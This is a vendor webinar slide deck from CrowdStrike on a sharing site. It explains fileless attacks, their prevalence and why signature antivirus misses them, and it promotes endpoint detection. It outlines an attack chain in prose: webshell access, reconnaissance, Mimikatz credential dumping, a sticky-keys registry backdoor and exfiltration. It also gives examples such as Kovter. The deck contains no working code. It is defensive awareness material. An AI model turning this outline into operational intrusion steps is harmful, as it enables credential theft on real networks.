Download as PDF, PPTX
Uploaded byCrowdStrike
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
The document discusses fileless attacks, which are cyber threats that do not rely on malicious executable files being written to disk and are more prevalent than traditional ransomware attacks. It explores how these attacks are conducted, including techniques like spear phishing and the use of legitimate applications for lateral movement, and emphasizes the inadequacy of traditional antivirus solutions against such methods. Key takeaways highlight the need for enhanced defenses beyond conventional malware detection to effectively mitigate breaches.
In this document
Powered by AI
Introduction to fileless attacks and the topics covered in the presentation.
Definition of fileless attacks including statistics that highlight their prevalence and concern levels.
Techniques used in fileless attacks, including methods like spear phishing and webshells.
Step-by-step breakdown of how a fileless attack occurs, from gaining access to exfiltration.
Specific examples including Kovter and nation-state attacks showcasing fileless techniques.
Explains how attackers can move laterally and extract credentials silently.
Strategies for protection, challenges of traditional approaches, and the importance of awareness.
Advancements in protection method against fileless attacks showing the need for updated defenses.
Information for further inquiries and engagement regarding fileless attacks.
More Related Content
![Overview of the Cyber Kill Chain [TM]](https://cdn.slidesharecdn.com/ss_thumbnails/cybersecuritykillchain8-161209191549-thumbnail.jpg?width=640&height=640&fit=bounds)
Similar to Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
![Fileless Malware [Cyber Security]](https://cdn.slidesharecdn.com/ss_thumbnails/fileless-210821094138-thumbnail.jpg?width=640&height=640&fit=bounds)
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
- 1. 2017 CROWDSTRIKE, INC.ALL RIGHTS RESERVED. WHO NEEDS MALWARE? UNDERSTANDING FILELESS ATTACKS AND HOW TO STOP THEM
- 2. 2017 CROWDSTRIKE, INC.ALL RIGHTS RESERVED. 1 What are fileless attacks 2 How does a fileless attack work 3 Real world examples 4 Why traditional approaches don’t work 5 The CrowdStrike approach
- 3. POOL QUESTION HOW WOULDYOU RATE YOUR KNOWLEDGE OF FILELESS ATTACKS 1 TO 5 (1 = NONE. 5 = EXPERT) 2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
- 5. WHAT IS AFILELESS ATTACK 2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. An attack that does not require a malicious executable file to be written to disk
- 7. 2017 CROWDSTRIKE, INC.ALL RIGHTS RESERVED. THE REALITY OF FILELESS ATTACKS Fileless techniques are not new More prevalent than Ransomware 24% vs. 21% 78% of organizations are concerned about fileless attacks Only 51% of breaches include malware - Source Verizon BDR 2017 Not all attacks are 100% fileless 80% of attacks use some fileless techniques - Source CrowdStrike Incident Response
- 8. FILELESS ATTACK TECHNIQUES 2017CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
- 9. 2017 CROWDSTRIKE, INC.ALL RIGHTS RESERVED. FILELESS TECHINQUES FILELESS INTRUSION TECHNIQUES OBSERVED BY THE FALCON PLATFORM § Spear phishing for credentials § Lateral movement using ‘living off the land’ tools (WMI, Unix commands, Powershell) § Registry persistence § Webshells
- 10. 2016 CROWDSTRIKE, INC.ALL RIGHTS RESERVED. 1. Attacker identifies organization with vulnerable web application 2. Remote attacker uses SQL injection or other vulnerability to drop payload 3. Vulnerable webserver is compromised and becomes backdoor WEBSHELL ATTACKS
- 11. 2017 CROWDSTRIKE, INC.ALL RIGHTS RESERVED. FILELESS TECHINQUES FILELESS INTRUSION TECHNIQUES OBSERVED BY THE FALCON PLATFORM § Spear phishing for credentials § Lateral movement using ‘living off the land’ tools (WMI, Unix commands, Powershell) § Registry persistence § Webshells § Powershell-based credential dumpers
- 12. G O AL T O O L S T E C H N I Q U E HOW A FILELESS ATTACK TAKES PLACE I N I T I A L C O M P R O M I S E 1 Remote access to a system using a web browser. Can be web scripting language E.g. China Chopper GAIN ACCESS WebShell C O M M A N D A N D C O N T R O L 2 Run system commands to find out where we are RECON Sysinfo, Whoami P R I V I L E G E E S C A L AT I O N 3 Run a PowerShell script such as Mimikatz to dump credentials DUMP CREDENTIALS PowerShell P E R S I S T E N C E 4 Modifies Registry to create a backdoor E.g. On screen keyboard or sticky keys MAINTAIN PERSISTENCE Registry E X F I LT R AT I O N 5 Uses system tools to gather data and China Chopper Webshell to exfiltrate data EXFILTRATE DATA VSSAdmin, Copy, NET use, Webshell
- 13. 2017 CROWDSTRIKE, INC.ALL RIGHTS RESERVED. REAL WORLD EXAMPLES § Fileless Malwre: Kovter § Fileless Attack: Nation State
- 14. 2017 CROWDSTRIKE, INC.ALL RIGHTS RESERVED. KOVTER § Click-fraud § Fileless after initial infection § Hides encrypted malicious modules in the registry § Hides other malicious modules in PowerShell scripts § Uses shortcut file (.lnk) to download PowerShell scripts. The script launches PowerShell to start a shellcode
- 15. 2017 CROWDSTRIKE, INC.ALL RIGHTS RESERVED. NATION STATE ATTACK § Weaponization: Spoofed website § Delivery: Spear phishing § PowerShell modules connect to a remote server § Install/run MimiKatz § Lateral movement through stolen credentials
- 16. MOVING LATERALLY WITHOUTMALWARE 2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. Attacker sets the bait with a fake website Extract credentials from initial victim Move laterally to other hosts
- 17. HOW TO PROTECTAGAINST FILELESS ATTACKS 2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
- 18. HOW WOULD YOURATE YOUR CURRENT LEVEL OF PROTECTION AGAINST FILELESS ATTACKS (1 = POOR – 5 = EXCELLENT) 2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
- 20. 2017 CROWDSTRIKE, INC.ALL RIGHTS RESERVED. EDUCATE 83%Rate traditional AV based signature efficacy good or excellent
- 21. 2017 CROWDSTRIKE, INC.ALL RIGHTS RESERVED. WHY TRADITIONAL APPROACHES DON’T WORK No file to analyze No artifacts left behind Blind if prevention fails Uses legitimate applications No file to detonate Hands on keyboard
- 22. PROTECTS AGAINST ALL TYPESOF ATTACKS Protect against Known/ Unknown Malware/Malware Free Protect Against Zero-Day Attacks Endpoint Detection and Response Managed Threat Hunting BENEFITS FALCON ENDPOINT PROTECTION Machine Learning IOA Behavioral Blocking Block Known Bad Exploit Mitigation 2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
- 23. PROCESS INJECTS A THREAD INTO SYSTEM PROCESS INJECTED THREAD READS CREDENTIALS FROM THE SYSTEM PROCESS MEMORY DUMPED CREDENTIALS ARE USED TO LOGIN INTO EXCHANGE SERVER MAILBOXES ARE EXPORTED OUT OF EXCHANGE INDICATORS OF ATTACK 2017CROWDSTRIKE, INC. ALL RIGHTS RESERVED. PROCESS CONDUCTS RECONNAISSANCE PROCESS ELEVATES PRIVILEGES WEB SERVER EXECUTES A PROCESS
- 24. 2017 CROWDSTRIKE, INC.ALL RIGHTS RESERVED. KEY TAKEAWAYS THE THREAT IS REAL TRADITIONAL AV IS NOT ENOUGH CURRENT DEFENSES DO NOT WORK NEED TO THINK BEYOND MALWARE AND FOCUS ON STOPPING THE BREACH
- 25. 2017 CROWDSTRIKE, INC.ALL RIGHTS RESERVED. Questions? Please submit all questions in the Q&A chat right below the presentation slides Contact Us Additional Information Join Weekly Demos crowdstrike.com/productdemos Featured Asset: How Adversaries Use Fileless Attacks To Evade Your Security Link in Resource List Website: crowdstrike.com Email: [email protected] Number: 1.888.512.8902 (US)